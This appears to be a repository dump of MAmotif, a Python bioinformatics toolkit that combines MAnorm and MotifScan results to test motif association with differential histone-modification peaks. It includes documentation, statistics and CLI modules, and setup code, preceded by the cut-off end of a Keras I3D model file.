1, 1), padding='same', name='MaxPool2d_5b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_5b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 5c\n branch_0 = conv3d_bn(x, 384, 1, 1, 1, padding='same', name='Conv3d_5c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_5c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 384, 3, 3, 3, padding='same', name='Conv3d_5c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 48, 1, 1, 1, padding='same', name='Conv3d_5c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_5c_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5c_3b_1x1')\n\n x_concatenate = Concatenate(axis=channel_axis, name='Mixed_5c')([branch_0, branch_1, branch_2, branch_3])\n\n\n # create model\n if include_top:\n # Classification block\n x = AveragePooling3D((2, 7, 7), strides=(1, 1, 1), padding='valid',\n name='global_avg_pool')(x_concatenate)\n x = Dropout(dropout)(x)\n x = conv3d_bn(x, classes, 1, 1, 1, padding='same',\n use_bias=True, use_activation_fn=False,\n use_bn=False, name='Conv3d_6a_1x1_new')\n num_frames_remaining = int(x.shape[1])\n x = Reshape((num_frames_remaining, classes))(x)\n # logits (raw scores for each class)\n x = Lambda(lambda x: K.mean(x, axis=1, keepdims=False),\n output_shape=lambda s: (s[0], s[2]))(x)\n # if not endpoint_logit:\n x = Activation(dense_activation, name='prediction')(x)\n net_model = Model(inputs, x, name='i3d_inception')\n if freeze_conv_layers:\n for layer in net_model.layers[:-5]:\n layer.trainable = False\n # for layer in net_model.layers:\n # print(layer.name, layer.trainable)\n else:\n h = int(x.shape[2])\n w = int(x.shape[3])\n x = AveragePooling3D((2, h, w), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x_concatenate)\n net_model = Model(inputs, x, name='i3d_no_top')\n if freeze_conv_layers:\n for layer in net_model.layers[:-5]:\n layer.trainable = False\n # for layer in net_model.layers:\n # print(layer.name, layer.trainable)\n\n if weights is not None:\n net_model.load_weights(weights, by_name=True)\n\n return net_model\n" } ]
4
shao-lab/MAmotif
https://github.com/shao-lab/MAmotif
d13058d4665e6d54e3af43a105fb1f40396feafc
eae1bfefc74934f49565371b06971a9781d00528
70bfae07aa3af5a1704a4ef58455dc66b61800c4
refs/heads/master
2021-06-04T18:24:18.884617
2020-05-21T13:57:56
2020-05-21T13:57:56
107,871,360
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.42553192377090454, "alphanum_fraction": 0.5602836608886719, "avg_line_length": 16.625, "blob_id": "d03d36f913c49c9f647a1a18c0258e8a358dfb3b", "content_id": "1609d93de7a611894c1419bae89fc67e264b1c16", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 141, "license_type": "permissive", "max_line_length": 50, "num_lines": 8, "path": "/CHANGELOG.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "ChangeLog\n=========\n\nv1.1.0 (2020-05-15)\n-------------------\n\n* Rewritten for Python 3.6+\n* Compatible with MAnorm 1.3.0 and MotifScan 1.2.0\n" }, { "alpha_fraction": 0.6521086692810059, "alphanum_fraction": 0.6654442548751831, "avg_line_length": 33.676300048828125, "blob_id": "40fdf404fd8b9febb0a956539b729c34be9ddec7", "content_id": "d63ce4533b8f959fcdc72af30c37ca45b82d1d15", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6001, "license_type": "permissive", "max_line_length": 121, "num_lines": 173, "path": "/docs/source/tutorial.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _tutorial:\n\n========\nTutorial\n========\n\n.. contents::\n :local:\n\nInstallation\n============\n\nLike many other Python packages and bioinformatics softwares, MAmotif can be\nobtained easily from PyPI_ or Bioconda_.\n\nPrerequisites\n-------------\n\n* Python >= 3.6\n* MAnorm >= 1.3.0\n* motifscan >= 1.2.0\n* numpy >= 1.15\n* scipy >= 1.0\n\n\nInstall with pip\n----------------\nThe latest release of MAmotif is available at PyPI_, you can install via ``pip``::\n\n $ pip install mamotif\n\n.. _PyPI: https://pypi.org/project/MAmotif/\n\nInstall with conda\n------------------\n\nYou can also install MAmotif with conda_ through Bioconda_ channel::\n\n $ conda install -c bioconda mamotif\n\n.. _conda: https://conda.io/\n.. _Bioconda: https://bioconda.github.io/\n\n\nUsage of MAmotif\n================\n\nTo check whether MAmotif is properly installed, you can inspect the version of\nMAmotif by the ``-v/--version`` option::\n\n $ mamotif --version\n\nConfiguration\n-------------\n\nBefore running MAmotif, you need to configure the genome and motif data files\nfor `MotifScan`:\n\nPlease refer to the QuickStart_ section of MotifScan for the details.\n\n.. _QuickStart: https://motifscan.readthedocs.io/en/latest/quickstart.html\n\nRun complete MAmotif workflow\n-----------------------------\n\nMAmotif provide a console script ``mamotif`` for running the program, the\n``mamotif run`` sub-command is used to run complete MAmotif workflow\n(MAnorm + MotifScan + Integration).\n\n.. code-block:: shell\n\n $ mamotif run --p1 sampleA_peaks.bed --p2 sampleB_peaks.bed --r1 sampleA_reads.bed --r2 sampleB_reads.bed -g <genome>\n –m <motif_set> -o <output_dir>\n\n.. tip::\n\n The ``run`` sub-command only provides basic MAnorm/MotifScan options.\n If you want to control other advanced options (MAnorm normalization\n options or MotifScan scanning options), please run them independently and\n call MAmotif integration module with the ``mamotif integrate`` sub-command.\n\nOptions\n^^^^^^^\n\n-h, --help Show help message and exit.\n--verbose Enable verbose log output.\n--p1, --peak1 **[Required]** Peak file of sample A.\n--p2, --peak2 **[Required]** Peak file of sample B.\n--pf, --peak-format Format of the peak files. 
Default: bed\n--r1, --read1        **[Required]** Read file of sample A.\n--r2, --read2        **[Required]** Read file of sample B.\n--rf, --read-format  Format of the read files. Default: bed\n--n1, --name1        Name of sample A.\n--n2, --name2        Name of sample B.\n--s1, --shiftsize1   Single-end reads shift size of sample A. Default: 100\n--s2, --shiftsize2   Single-end reads shift size of sample B. Default: 100\n--pe, --paired-end   Paired-end mode.\n-m                   **[Required]** Motif set to scan for.\n-g                   **[Required]** Genome name.\n-p                   P value cutoff for motif scores. Default: 1e-4\n-t, --threads        Number of processes used to run in parallel.\n--mode               Which sample to perform MAmotif on {both,A,B}. Default: both\n--split              Split genomic regions into promoter/distal regions and\n                     run separately.\n--upstream           TSS upstream distance for promoters. Default: 4000\n--downstream         TSS downstream distance for promoters. Default: 2000\n--correction         Method for multiple testing correction {benjamin,bonferroni}.\n                     Default: benjamin\n-o, --output-dir     Directory to write output files.\n\n\nIntegrate MAnorm and MotifScan results\n--------------------------------------\n\nThe ``mamotif integrate`` sub-command is used when users already have the\nMAnorm and MotifScan results and only need to run the final integration\nprocedure.\n\nSuppose you have the MAnorm result (sample A vs sample B), and the MotifScan\nresults for both samples:\n\nTo find cell type-specific co-factors for sample A:\n\n.. code-block:: shell\n\n    $ mamotif integrate -i A_MAvalues.xls -m A_motifscan/motif_sites_number.xls -o <path>\n\nConvert M=log2(A/B) to -M=log2(B/A) and find co-factors for sample B:\n\n.. code-block:: shell\n\n    $ mamotif integrate -i B_MAvalues.xls -m B_motifscan/motif_sites_number.xls -n -o <path>\n\nOptions\n^^^^^^^\n\n-h, --help        Show help message and exit.\n--verbose         Enable verbose log output.\n-i                MAnorm result for sample A or B (A/B_MAvalues.xls).\n-m                MotifScan result for sample A or B (motif_sites_number.xls).\n-n, --negative    Convert M=log2(A/B) to -M=log2(B/A). Required when finding\n                  co-factors for sample B.\n-g                Genome name. Required if `--split` is enabled.\n--split           Split genomic regions into promoter/distal regions and run separately.\n--upstream        TSS upstream distance for promoters. Default: 4000\n--downstream      TSS downstream distance for promoters. Default: 2000\n--correction      Method for multiple testing correction {benjamin,bonferroni}.\n                  Default: benjamin\n-o, --output-dir  Directory to write output files.\n\nMAmotif Output\n==============\n\nAfter MAmotif finishes running, all output files will be written to the\ndirectory you specified with the \"-o\" argument.\n\nThe MAmotif output table includes the following columns:\n\n::\n\n    1. Motif Name\n    2. Target Number: Number of motif-present peaks\n    3. Average of Target M values: Average M-value of motif-present peaks\n    4. Std. of Target M values: M-value Std. of motif-present peaks\n    5. Non-target Number: Number of motif-absent peaks\n    6. Average of Non-target M values: Average M-value of motif-absent peaks\n    7. Std. of Non-target M values: M-value Std. of motif-absent peaks\n    8. T-test Statistic: T-statistic for M-values of motif-present peaks against motif-absent peaks\n    9. T-test P-value: Right-tailed P-value of T-test\n    10. T-test P-value By Benjamin/Bonferroni correction\n    11. RankSum-test Statistic\n    12. RankSum-test P-value\n    13. RankSum-test P-value By Benjamin/Bonferroni correction\n    14. 
Maximal P-value: Maximal corrected P-value of T-test and RankSum-test\n" }, { "alpha_fraction": 0.6057673096656799, "alphanum_fraction": 0.6085904240608215, "avg_line_length": 39.317073822021484, "blob_id": "63b0aa3a77609f7671812653b4e01d35a6fe1da0", "content_id": "af0ea0bba395b419a377307acb5eba2b7ce75d5a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4959, "license_type": "permissive", "max_line_length": 79, "num_lines": 123, "path": "/mamotif/integration.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.integration\n-------------------\n\nThe final integration module of MAmotif.\n\"\"\"\n\nimport logging\nimport os\n\nimport numpy as np\nfrom motifscan.genome import Genome\nfrom motifscan.region.utils import subset_by_location\n\nfrom mamotif.io import write_mamotif_results\nfrom mamotif.region import load_mamotif_regions\nfrom mamotif.stats import mamotif_t_test, mamotif_ranksum_test, adjust_p_values\n\nlogger = logging.getLogger(__name__)\n\n\nclass MAmotifResult:\n def __init__(self, motif, n_pos, mean_pos, std_pos, n_neg, mean_neg,\n std_neg, t_stat, t_pval, t_padj, r_stat, r_pval, r_padj,\n padj):\n self.motif = motif\n self.n_pos = n_pos\n self.mean_pos = mean_pos\n self.std_pos = std_pos\n self.n_neg = n_neg\n self.mean_neg = mean_neg\n self.std_neg = std_neg\n self.t_stat = t_stat\n self.t_pval = t_pval\n self.t_padj = t_padj\n self.r_stat = r_stat\n self.r_pval = r_pval\n self.r_padj = r_padj\n self.padj = padj\n\n\ndef mamotif_test(motifs, regions, negative=False, correction='benjamin'):\n results = []\n for idx, motif in enumerate(motifs):\n m_values_pos = []\n m_values_neg = []\n for region in regions:\n if region.has_motif[idx]:\n m_values_pos.append(region.m_value)\n else:\n m_values_neg.append(region.m_value)\n m_values_pos = np.asarray(m_values_pos)\n m_values_neg = np.asarray(m_values_neg)\n if negative: # convert M to -M for sample B, log2(A/B)-> log2(B/A)\n m_values_pos = -m_values_pos\n m_values_neg = -m_values_neg\n t_test = mamotif_t_test(m_values_pos, m_values_neg)\n r_test = mamotif_ranksum_test(m_values_pos, m_values_neg)\n result = MAmotifResult(\n motif=motif, n_pos=len(m_values_pos), mean_pos=m_values_pos.mean(),\n std_pos=m_values_pos.std(), n_neg=len(m_values_neg),\n mean_neg=m_values_neg.mean(), std_neg=m_values_neg.std(),\n t_stat=t_test[0], t_pval=t_test[1], t_padj=None,\n r_stat=r_test[0], r_pval=r_test[1], r_padj=None,\n padj=None)\n results.append(result)\n\n # multiple testing correction\n p_values_t = [result.t_pval for result in results]\n p_values_r = [result.r_pval for result in results]\n adjusted_p_values_t = adjust_p_values(p_values_t, correction=correction)\n adjusted_p_values_r = adjust_p_values(p_values_r, correction=correction)\n for idx, result in enumerate(results):\n result.t_padj = adjusted_p_values_t[idx]\n result.r_padj = adjusted_p_values_r[idx]\n if np.isnan(result.t_padj):\n result.padj = result.r_padj\n elif np.isnan(result.r_padj):\n result.padj = result.t_padj\n else:\n result.padj = max(result.t_padj, result.r_padj)\n return results\n\n\ndef run_integration(f_manorm, f_motifscan, negative=False, genome=None,\n split=False, upstream=4000, downstream=2000,\n correction='benjamin', output_dir=None):\n motifs, regions = load_mamotif_regions(f_manorm, f_motifscan)\n sample_name = os.path.basename(f_manorm).replace('_MAvalues.xls', '')\n output_dir = os.path.abspath(output_dir or os.getcwd())\n if not 
os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n results = mamotif_test(motifs=motifs, regions=regions,\n negative=negative, correction=correction)\n path = os.path.join(output_dir, sample_name + '_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results, correction=correction)\n\n if split:\n logger.info(\"Split into promoter/distal regions\")\n genome = Genome(genome)\n regions_promoter = subset_by_location(\n regions=regions, genes=genome.genes, location='promoter',\n upstream=upstream, downstream=downstream)\n regions_distal = subset_by_location(\n regions=regions, genes=genome.genes, location='distal',\n upstream=upstream, downstream=downstream)\n\n logger.info(\"Performing MAmotif on promoter regions\")\n results = mamotif_test(motifs=motifs, regions=regions_promoter,\n negative=negative, correction=correction)\n path = os.path.join(output_dir,\n sample_name + '_promoter_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results,\n correction=correction)\n\n logger.info(\"Performing MAmotif on distal regions\")\n results = mamotif_test(motifs=motifs, regions=regions_distal,\n negative=negative, correction=correction)\n path = os.path.join(output_dir,\n sample_name + '_distal_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results,\n correction=correction)\n" }, { "alpha_fraction": 0.5796559453010559, "alphanum_fraction": 0.5796559453010559, "avg_line_length": 39.51515197753906, "blob_id": "1eb87c06f6366af8a45f1cf9111dadb234f48f04", "content_id": "f1a4c3d48c46c8ca3eaa4c77815856a0dca9204a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1337, "license_type": "permissive", "max_line_length": 79, "num_lines": 33, "path": "/mamotif/io.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.io\n----------\nI/O module of MAmotif.\n\"\"\"\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef write_mamotif_results(path, results, correction):\n logger.info(f\"Saving MAmotif results to {path}\")\n correction_str = correction.capitalize()\n columns = [\"Motif Name\", \"Target Number\", \"Average of Target M values\",\n \"Std. of Target M values\", \"Non-target Number\",\n \"Average of Non-target M values\", \"Std. 
of Non-target M values\",\n \"T-test Statistic\", \"T-test P value (right-tailed)\",\n f\"T-test P value By {correction_str} correction\",\n \"RankSum-test Statistic\", \"RankSum-test P value (right-tailed)\",\n f\"RankSum-test P value By {correction_str} correction\",\n \"Maximal corrected P value\\n\"]\n header = '\\t'.join(columns)\n results.sort(key=lambda x: x.padj)\n with open(path, 'w') as fout:\n fout.write(header)\n for result in results:\n fout.write(\n f\"{result.motif}\\t{result.n_pos}\\t{result.mean_pos}\\t\"\n f\"{result.std_pos}\\t{result.n_neg}\\t{result.mean_neg}\\t\"\n f\"{result.std_neg}\\t{result.t_stat}\\t{result.t_pval}\\t\"\n f\"{result.t_padj}\\t{result.r_stat}\\t{result.r_pval}\\t\"\n f\"{result.r_padj}\\t{result.padj}\\n\")\n" }, { "alpha_fraction": 0.6221884489059448, "alphanum_fraction": 0.630699098110199, "avg_line_length": 40.125, "blob_id": "3d7da50539266b1e78a9dd2354d43c0dda57b9f9", "content_id": "ff430dfc15bbf22b449360735d47977c836d6a1b", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3290, "license_type": "permissive", "max_line_length": 79, "num_lines": 80, "path": "/mamotif/cli/run.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.run\n---------------\n\nRun complete MAmotif workflow (MAnorm + MotifScan + Integration).\n\"\"\"\n\nimport logging\nimport os\n\nimport manorm.cli as cli_manorm\nimport motifscan.cli.main as cli_motifscan\n\nfrom mamotif.integration import run_integration\n\nlogger = logging.getLogger(__name__)\n\n\ndef run_manorm_from_mamotif(args):\n args.name1 = args.name1 or os.path.splitext(\n os.path.basename(args.peak_file1))[0]\n args.name2 = args.name2 or os.path.splitext(\n os.path.basename(args.peak_file2))[0]\n manorm_dir = os.path.abspath(\n os.path.join(args.output_dir,\n f'{args.name1}_vs_{args.name2}_manorm_output'))\n args_manorm = [\n \"--p1\", args.peak_file1, \"--p2\", args.peak_file2,\n \"--pf\", args.peak_format, \"--r1\", args.read_file1,\n \"--r2\", args.read_file2, \"--rf\", args.read_format,\n \"--n1\", args.name1, \"--n2\", args.name2,\n \"--s1\", args.shift_size1, \"--s2\", args.shift_size2,\n \"--wa\", \"-o\", manorm_dir]\n if args.paired:\n args_manorm.append(\"--pe\")\n\n parser_manorm = cli_manorm.configure_parser()\n args_manorm = parser_manorm.parse_args(map(str, args_manorm))\n args_manorm = cli_manorm.preprocess_args(args_manorm)\n cli_manorm.run(args_manorm)\n return manorm_dir\n\n\ndef run_motifscan_from_mamotif(args, f_manorm):\n sample_name = os.path.basename(f_manorm).replace('_MAvalues.xls', '')\n motifscan_dir = os.path.abspath(\n os.path.join(args.output_dir, f'{sample_name}_motifscan_output'))\n args_motifscan = [\n \"scan\", \"-i\", f_manorm, \"-f\", \"manorm\", \"--motif\", args.motif,\n \"--genome\", args.genome, \"-p\", args.p_value, \"-t\", args.n_threads,\n \"--no-enrich\", \"-o\", motifscan_dir]\n\n parser_motifscan = cli_motifscan.configure_parser_main()\n args_motifscan = parser_motifscan.parse_args(map(str, args_motifscan))\n args_motifscan.func(args_motifscan)\n return os.path.join(motifscan_dir, \"motif_sites_number.xls\")\n\n\ndef run(args):\n cli_manorm.setup_logger(args.verbose)\n cli_motifscan.setup_logger(args.verbose)\n manorm_dir = run_manorm_from_mamotif(args)\n if args.mode in ['both', 'A']:\n logger.info(\"\\nScanning motifs for sample A\")\n f_manorm = os.path.join(manorm_dir, f\"{args.name1}_MAvalues.xls\")\n f_motifscan = run_motifscan_from_mamotif(args, 
f_manorm)\n        logger.info(\"Running MAmotif for sample A\")\n        run_integration(f_manorm=f_manorm, f_motifscan=f_motifscan,\n                        negative=False, genome=args.genome, split=args.split,\n                        upstream=args.upstream, downstream=args.downstream,\n                        correction=args.correction, output_dir=args.output_dir)\n    if args.mode in ['both', 'B']:\n        logger.info(\"\\nScanning motifs for sample B\")\n        f_manorm = os.path.join(manorm_dir, f\"{args.name2}_MAvalues.xls\")\n        f_motifscan = run_motifscan_from_mamotif(args, f_manorm)\n        logger.info(\"Running MAmotif for sample B\")\n        run_integration(f_manorm=f_manorm, f_motifscan=f_motifscan,\n                        negative=True, genome=args.genome, split=args.split,\n                        upstream=args.upstream, downstream=args.downstream,\n                        correction=args.correction, output_dir=args.output_dir)\n" }, { "alpha_fraction": 0.5994733572006226, "alphanum_fraction": 0.602106511592865, "avg_line_length": 31.55238151550293, "blob_id": "a1292a94db148b7bc778a6d4c4acbc88c8340ac9", "content_id": "1b16d89fde3621ee734a759c48483cdbfa40effb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3418, "license_type": "permissive", "max_line_length": 78, "num_lines": 105, "path": "/mamotif/region.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.region\n--------------\nGenomic regions used in MAmotif.\n\"\"\"\n\nimport logging\n\nimport numpy as np\nfrom motifscan.region import load_motifscan_regions\n\nlogger = logging.getLogger(__name__)\n\n\nclass MamotifRegion:\n    \"\"\"Class for a MAmotif genomic region.\n\n    Parameters\n    ----------\n    chrom : str\n        The chromosome name of the region.\n    start : int\n        The start coordinate of the region.\n    end : int\n        The end coordinate of the region.\n    n_sites : list of int\n        The motif sites numbers of the region.\n    m_value : float, optional\n        The m_value of the region.\n\n    Attributes\n    ----------\n    chrom : str\n        The chromosome name of the region.\n    start : int\n        The start coordinate of the region.\n    end : int\n        The end coordinate of the region.\n    m_value : float or None\n        The m_value of the region or None if not specified.\n    has_motif : list of bool\n        The target site indicators for motifs.\n\n    Notes\n    -----\n    The coordinates are 0-based, which means the region range is [start, end).\n    \"\"\"\n\n    def __init__(self, chrom, start, end, n_sites, m_value=None):\n        self.chrom = chrom\n        self.start = int(start)\n        self.end = int(end)\n        self.m_value = m_value\n        self.has_motif = np.asarray(n_sites) > 0\n\n    def match_manorm(self, manorm_regions):\n        for region in manorm_regions:\n            if (region.chrom == self.chrom) and (\n                    region.start == self.start) and (region.end == self.end):\n                self.m_value = region.score\n                break\n        if self.m_value is None:\n            raise ValueError(f\"no matched MAnorm region found for: {self!r}\")\n\n    def __repr__(self):\n        return f\"GenomicRegion({self.chrom}:{self.start}-{self.end})\"\n\n\ndef load_mamotif_regions(f_manorm, f_motifscan):\n    logger.info(\"Loading MAnorm result\")\n    manorm_regions = load_motifscan_regions(f_manorm, 'manorm')\n    logger.info(\"Loading MotifScan result\")\n    logger.info(f\"Loading genomic regions from {f_motifscan} [motifscan]\")\n    regions = []\n    with open(f_motifscan, 'r') as fin:\n        line = fin.readline()\n        header = line.strip().split('\\t')\n        if header[:3] != ['chr', 'start', 'end']:\n            raise ValueError(\n                \"not a valid MotifScan motif_sites_number.xls file\")\n        motifs = header[3:]\n        for line in fin:\n            fields = line.strip().split('\\t')\n            chrom = fields[0]\n            start = int(fields[1]) - 1\n            end = int(fields[2])\n            n_sites = list(map(int, fields[3:]))\n            region = MamotifRegion(chrom=chrom, start=start, end=end,\n                                   n_sites=n_sites)\n            regions.append(region)\n    logger.info(f\"Loaded {len(regions)} genomic regions\")\n\n    logger.info(\"Matching MAnorm and MotifScan results\")\n    if len(manorm_regions) != len(regions):\n        logger.warning(\"the numbers of genomic regions do not match!\")\n    # group manorm regions by chrom to match with motifscan\n    manorm_regions_by_chrom = {}\n    for region in manorm_regions:\n        manorm_regions_by_chrom.setdefault(region.chrom, [])\n        manorm_regions_by_chrom[region.chrom].append(region)\n\n    # find the matched manorm region and set the M value\n    for region in regions:\n        region.match_manorm(manorm_regions_by_chrom[region.chrom])\n    return motifs, regions\n" }, { "alpha_fraction": 0.5299198031425476, "alphanum_fraction": 0.5373226404190063, "avg_line_length": 27.438596725463867, "blob_id": "3b98d5600444d2c702cb4272518131356e732e59", "content_id": "a919b7ca936ead905316da9ec7761118a3d9a6e6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1621, "license_type": "permissive", "max_line_length": 69, "num_lines": 57, "path": "/mamotif/stats.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.stats\n-------------\n\nStatistical functions used in MAmotif.\n\"\"\"\n\nimport numpy as np\nfrom scipy import stats\n\n\ndef mamotif_t_test(m_values_pos, m_values_neg):\n    try:\n        t_stat, p_value = stats.ttest_ind(m_values_pos, m_values_neg,\n                                          equal_var=False)\n        if t_stat < 0:\n            p_right = 1 - p_value / 2\n        else:\n            p_right = p_value / 2\n        return t_stat, p_right\n    except Exception:\n        return np.nan, np.nan\n\n\ndef mamotif_ranksum_test(m_values_pos, m_values_neg):\n    try:\n        z_stat, p_value = stats.ranksums(m_values_pos, m_values_neg)\n        if z_stat < 0:\n            p_right = 1 - p_value / 2\n        else:\n            p_right = p_value / 2\n        return z_stat, p_right\n    except Exception:\n        return np.nan, np.nan\n\n\ndef adjust_p_values(p_values, correction='benjamin'):\n    n = len(p_values)\n    adjusted_p_values = []\n    if correction == 'benjamin':\n        order = np.argsort(p_values)\n        ranks = np.empty_like(order)\n        ranks[order] = np.arange(1, n + 1)\n        for p_value, rank in zip(p_values, ranks):\n            if np.isnan(p_value):\n                adjusted_p_values.append(np.nan)\n            else:\n                adjusted_p_values.append(min(1, p_value * n / rank))\n    elif correction == 'bonferroni':\n        for p_value in p_values:\n            if np.isnan(p_value):\n                adjusted_p_values.append(np.nan)\n            else:\n                adjusted_p_values.append(min(1, p_value * n))\n    else:\n        raise ValueError(f\"invalid correction type: {correction}\")\n    return adjusted_p_values\n" }, { "alpha_fraction": 0.6131538152694702, "alphanum_fraction": 0.7193164229393005, "avg_line_length": 33.48214340209961, "blob_id": "c2edfce7695bf5369460d8fd84f380377de5d0e2", "content_id": "1daac0e715692cf0e028761794372ebe01328d82", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1931, "license_type": "permissive", "max_line_length": 190, "num_lines": 56, "path": "/docs/source/demo.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _demo:\n\nExample Usage\n=============\n\nHere we provide step-by-step instructions on how to use MAmotif to find candidate\ncell-type specific regulators associated with certain histone modifications.\n\nWe take the H3K4me3 analysis between adult and fetal ProES in the MAmotif\npaper as an example:\n\n1. Install MAmotif::\n\n    $pip install mamotif\n    $conda install -c bioconda mamotif\n\n2. Download example data files::\n\n    $mkdir MAmotif_demo\n    $cd MAmotif_demo\n    $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908038/suppl/GSM908038_H3K4me3-F_peaks.bed.gz\n    $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908039/suppl/GSM908039_H3K4me3-A_peaks.bed.gz\n    $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908038/suppl/GSM908038_H3K4me3-F.bed.gz\n    $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908039/suppl/GSM908039_H3K4me3-A.bed.gz\n    $gzip -d *gz\n\n    Remove the header line and ribosomal reads\n    $sed -i '1d' GSM908038_H3K4me3-F.bed\n    $sed -i '1d' GSM908039_H3K4me3-A.bed\n    $sed -i '8986927,$d' GSM908038_H3K4me3-F.bed\n    $sed -i '14916308,$d' GSM908039_H3K4me3-A.bed\n\n    Substitute spaces with tabs in the bed files\n    $sed -i \"s/ /\\t/g\" GSM908038_H3K4me3-F.bed\n    $sed -i \"s/ /\\t/g\" GSM908039_H3K4me3-A.bed\n\n.. note::\n\n    The modification steps above are specific to the example data files,\n    since their format does not follow the standard. You do not have to do\n    this for your own data.\n\n\n3. Install genome `hg18` from UCSC database::\n\n    $ motifscan genome --install -n hg18 -r hg18\n\n4. Install the motif PFM set from JASPAR database::\n\n    $ motifscan motif --install -n vertebrates -r vertebrates_non-redundant -g hg18\n\n5. Run MAmotif::\n\n    $mamotif run --p1 GSM908039_H3K4me3-A_peaks.bed --p2 GSM908038_H3K4me3-F_peaks.bed --r1 GSM908039_H3K4me3-A.bed --r2 GSM908038_H3K4me3-F.bed -g hg18 -m vertebrates -o AvsF_H3K4me3_MAmotif\n\n6. Check the output files of MAmotif\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5862069129943848, "avg_line_length": 8.666666984558105, "blob_id": "b3f60c17751eb2ff631971c115c627564a4a9e45", "content_id": "bf7a88bd1abce2867bbabcafafc100bcb9657d05", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "permissive", "max_line_length": 21, "num_lines": 6, "path": "/tests/test_cli.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "def test_run():\n    pass\n\n\ndef test_integrate():\n    pass\n" }, { "alpha_fraction": 0.6044444441795349, "alphanum_fraction": 0.6044444441795349, "avg_line_length": 10.25, "blob_id": "5f286148e3e7468a6ee3434d7642ef155bf3606794", "content_id": "6b6a7ffe8f468a6ee3434d7642ef155bf3606794", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 225, "license_type": "permissive", "max_line_length": 50, "num_lines": 20, "path": "/docs/source/contact.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. 
_contact:\n\nContact\n=======\n\n\nGitHub Issue\n------------\n\nWelcome to ask questions or report bugs on GitHub:\n\nhttps://github.com/shao-lab/MAmotif/issues\n\nEmail\n-----\n\nPlease contact:\n\n * Hongduo Sun ([email protected])\n * Zhen Shao ([email protected])\n" }, { "alpha_fraction": 0.5956258773803711, "alphanum_fraction": 0.6123778223991394, "avg_line_length": 28.84722137451172, "blob_id": "24c5ebd076608239c0084dd297c61c1f117bca80", "content_id": "5ab8ddb2218e3f3ce587073a81738d0304447a1b", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 74, "num_lines": 72, "path": "/setup.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\n\nfrom setuptools import find_packages, setup\n\npy_version = sys.version_info[:2]\nif py_version < (3, 6):\n raise RuntimeError(\"MAmotif requires Python 3.6+ to install!\")\n\ndescription = \"An integrative toolkit for detecting cell type-specific \" \\\n \"regulators\"\n\npkg_dir = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(pkg_dir, 'mamotif', '__init__.py')) as fin:\n version = re.search(r\"__version__ = '(.*?)'\", fin.read()).group(1)\n\nwith open(os.path.join(pkg_dir, 'README.rst')) as fin:\n long_description = fin.read()\n\ninstall_requires = [\n \"numpy>=1.15\",\n \"scipy>=1.0\",\n \"MAnorm>=1.3.0\",\n \"motifscan>=1.2.0\"\n]\n\nextras_require = {\n \"test\": [\"pytest>=4.0.0\",\n \"pytest-cov>=2.8.0\"],\n \"docs\": [\"sphinx>=2.0.0\",\n 